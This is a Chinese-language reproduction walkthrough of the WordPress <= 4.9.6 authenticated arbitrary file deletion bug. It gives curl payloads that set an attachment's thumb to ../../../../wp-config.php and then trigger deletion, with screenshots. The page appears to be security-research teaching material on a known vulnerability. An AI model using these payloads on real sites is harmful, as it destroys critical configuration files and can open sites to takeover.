WordPress _= 4.9.6 任意文件删除漏洞

WordPress \<= 4.9.6 任意文件删除漏洞 ==================================== 一、漏洞简介 ------------ 利用条件L:需要进入后台 二、漏洞影响 ------------ 三、复现过程 ------------ ### 添加新媒体 访问[http://0-sec.org/wp-admin/upload.php,然后上传图片。](http://0-sec.org/wp-admin/upload.php,然后上传图片。) ![img](/static/yougar/Web安全/Wordpress/Wordpress 系统漏洞/resource/Wordpress<=4.9.6任意文件删除漏洞/media/rId26.png) ### 将\$ meta \[\'thumb\'\]设置为我们要删除的文件 #### 单击我们在中上传的图像Step 2,并记住图像的ID。 ![img](/static/yougar/Web安全/Wordpress/Wordpress 系统漏洞/resource/Wordpress<=4.9.6任意文件删除漏洞/media/rId29.png) #### 访问[http://0-sec.org/wp-admin/post.php?post=4&action=edit.\_wpnonce在页面源中查找](http://0-sec.org/wp-admin/post.php?post=4&action=edit._wpnonce在页面源中查找) ![img](/static/yougar/Web安全/Wordpress/Wordpress 系统漏洞/resource/Wordpress<=4.9.6任意文件删除漏洞/media/rId32.png) #### 发送有效载荷: curl -v 'http://0-sec.org/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' ![img](/static/yougar/Web安全/Wordpress/Wordpress 系统漏洞/resource/Wordpress<=4.9.6任意文件删除漏洞/media/rId34.png) ### 发动攻击 #### 在页面源码中查找 \_wpnonce ![img](/static/yougar/Web安全/Wordpress/Wordpress 系统漏洞/resource/Wordpress<=4.9.6任意文件删除漏洞/media/rId37.png) #### 发送有效载荷 curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' ![img](/static/yougar/Web安全/Wordpress/Wordpress 系统漏洞/resource/Wordpress<=4.9.6任意文件删除漏洞/media/rId39.png) #### 刷新页面 image

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容